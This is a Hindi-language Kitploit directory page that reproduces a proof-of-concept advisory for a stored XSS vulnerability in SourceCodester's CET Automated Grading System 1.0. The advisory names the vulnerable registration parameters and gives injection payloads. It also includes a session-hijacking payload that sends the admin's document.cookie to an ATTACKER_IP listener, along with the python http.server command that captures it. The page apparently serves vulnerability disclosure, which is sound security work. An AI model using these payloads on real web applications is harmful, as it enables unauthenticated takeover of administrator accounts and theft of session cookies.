Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-7401-XSS — सोर्सकोडेस्टर CET स्वचालित ग्रेडिंग सिस्टम 1.0 में संग्रहीत XSS के लिए प्रूफ-ऑफ-कॉन्सेप्ट, जो छात्र पंजीकरण के माध्यम से बिना प्रमाणीकरण के पेलोड इंजेक्शन प्रदर्शित करता है, जिससे एडमिन सत्र अपहरण होता है। | Kitploit
उपकरण/GitHubGitHub/xmyronn/cve-2026-7401-xss
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubxmyronn/cve-2026-7401-xss

CVE-2026-7401-XSS

सोर्सकोडेस्टर CET स्वचालित ग्रेडिंग सिस्टम 1.0 में संग्रहीत XSS के लिए प्रूफ-ऑफ-कॉन्सेप्ट, जो छात्र पंजीकरण के माध्यम से बिना प्रमाणीकरण के पेलोड इंजेक्शन प्रदर्शित करता है, जिससे एडमिन सत्र अपहरण होता है।

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CET ऑटोमेटेड ग्रेडिंग सिस्टम में स्टोर्ड XSS — छात्र पंजीकरण (बिना प्रमाणीकरण → एडमिन डैशबोर्ड)

विवरण

फ़ील्डमान
विक्रेताSourceCodester
विक्रेता URLhttps://www.sourcecodester.com
उत्पादPHP और MySQL में AI प्रेडिक्टिव एनालिटिक्स के साथ CET ऑटोमेटेड ग्रेडिंग सिस्टम
उत्पाद URLhttps://www.sourcecodester.com/php/18686/cet-automated-grading-system-ai-predictive-analytics-php-and-mysql.html
संस्करण1.0
भेद्यतास्टोर्ड क्रॉस-साइट स्क्रिप्टिंग (XSS)
CWECWE-79
CVSSv3 स्कोर8.8 (उच्च)
हमला वेक्टरनेटवर्क
प्रमाणीकरण आवश्यककोई नहीं (छात्र स्व-पंजीकरण सार्वजनिक है)
पीड़ितव्यवस्थापक
उपयोगकर्ता सहभागिताआवश्यक (एडमिन डैशबोर्ड पर जाता है)
शोधकर्ताइमाद अल्वी
दिनांक2026-04-13

प्रभावित घटक

फ़ाइल: PersonalAGS/index.php?action=register (छात्र पंजीकरण)
पैरामीटर: student_id, full_name, section, username (POST)
ट्रिगर होता है: PersonalAGS/index.php?action=dashboard (एडमिन डैशबोर्ड)


विवरण

CET ऑटोमेटेड ग्रेडिंग सिस्टम 1.0 में छात्र स्व-पंजीकरण पोर्टल डेटाबेस में संग्रहीत करने से पहले उपयोगकर्ता द्वारा प्रदान किए गए इनपुट को सैनिटाइज़ या एनकोड करने में विफल रहता है। एक बिना प्रमाणीकृत हमलावर किसी भी पंजीकरण फ़ील्ड में इंजेक्ट किए गए JavaScript पेलोड के साथ एक छात्र खाता पंजीकृत कर सकता है। दुर्भावनापूर्ण पेलोड डेटाबेस में संग्रहीत होता है और किसी भी व्यवस्थापक के ब्राउज़र में निष्पादित होता है जो उस डैशबोर्ड पर जाता है जहाँ नामांकित छात्र सूचीबद्ध होते हैं।

यह एक गंभीर हमला श्रृंखला है — पेलोड इंजेक्ट करने के लिए कोई प्रमाणीकरण आवश्यक नहीं है, लेकिन यह एक विशेषाधिकार प्राप्त एडमिन संदर्भ में निष्पादित होता है, जिससे सत्र कुकी चोरी और पूर्ण एडमिन खाता अधिग्रहण संभव हो जाता है।


प्रूफ ऑफ कॉन्सेप्ट

चरण 1 — छात्र पंजीकरण पर जाएँ (कोई प्रमाणीकरण आवश्यक नहीं)

सार्वजनिक छात्र स्व-पंजीकरण पृष्ठ पर जाएँ:

root@kitploit:~
http://localhost/cet-personalagms/PersonalAGS/index.php?action=register

चरण 2 — पंजीकरण फ़ील्ड में XSS पेलोड इंजेक्ट करें

सभी फ़ील्ड को XSS पेलोड से भरें और खाता पंजीकृत करें पर क्लिक करें:

  • छात्र आईडी नंबर: "><svg onload=alert(1)>
  • पूरा नाम: "><svg onload=alert(1)>
  • सेक्शन: "><svg onload=alert(1)>
  • वांछित उपयोगकर्ता नाम: "><svg onload=alert(1)>
Screenshot 2026-04-13 030707

पंजीकरण सफल होता है — पेलोड डेटाबेस में संग्रहीत हो जाते हैं।

चरण 3 — एडमिन डैशबोर्ड पर XSS सक्रिय होता है

जब व्यवस्थापक लॉग इन करता है और डैशबोर्ड पर जाता है, तो इंजेक्ट किया गया पेलोड तुरंत निष्पादित होता है। अलर्ट पॉपअप सक्रिय होता है और इंजेक्ट किए गए HTML द्वारा पृष्ठ लेआउट स्पष्ट रूप से टूट जाता है — यह पुष्टि करता है कि पेलोड एडमिन पैनल में बिना सैनिटाइज़ किए प्रस्तुत किया गया है।

डैशबोर्ड सेक्शन हेडर भी इंजेक्ट किए गए मानों को प्रतिबिंबित करते हैं:

  • 1ST YEAR - SECTION 1ST YEAR" ONMOUSEOVE
  • 3RD YEAR - SECTION " ONLOAD=ALERT(1) X=
Screenshot 2026-04-13 030717

सत्र अपहरण पेलोड

एक हमलावर पंजीकरण फ़ील्ड में निम्नलिखित पेलोड का उपयोग करके इसे पूर्ण एडमिन सत्र अपहरण तक बढ़ा सकता है:

root@kitploit:~
" onmouseover="new Image().src='http://ATTACKER_IP:8888/?c='+document.cookie" x="

हमलावर मशीन पर एक लिसनर सेट करें:

root@kitploit:~
python3 -m http.server 8888

जब एडमिन डैशबोर्ड पर जाता है, तो उनका सत्र कुकी हमलावर के सर्वर पर भेज दिया जाता है, जिससे पूर्ण खाता अधिग्रहण संभव हो जाता है।


प्रभाव

एक बिना प्रमाणीकृत हमलावर यह कर सकता है:

  • सार्वजनिक छात्र पंजीकरण के माध्यम से एडमिन डैशबोर्ड में लगातार JavaScript इंजेक्ट करना
  • व्यवस्थापक का सत्र कुकी चुराना और एडमिन खाता अपने कब्जे में लेना
  • पीड़ित की ओर से कोई भी एडमिन कार्रवाई करना
  • व्यवस्थापकों को दुर्भावनापूर्ण पृष्ठों पर पुनर्निर्देशित करना
  • एडमिन डैशबोर्ड को विकृत करना

पेलोड इंजेक्ट करने के लिए कोई प्रमाणीकरण आवश्यक नहीं है। जब कोई व्यवस्थापक डैशबोर्ड पर जाता है तो हमला स्वचालित रूप से निष्पादित होता है।


संदर्भ

  • SourceCodester — CET ऑटोमेटेड ग्रेडिंग सिस्टम
  • CWE-79: वेब पेज निर्माण के दौरान इनपुट का अनुचित न्यूट्रलाइज़ेशन।
टूल डाउनलोड करें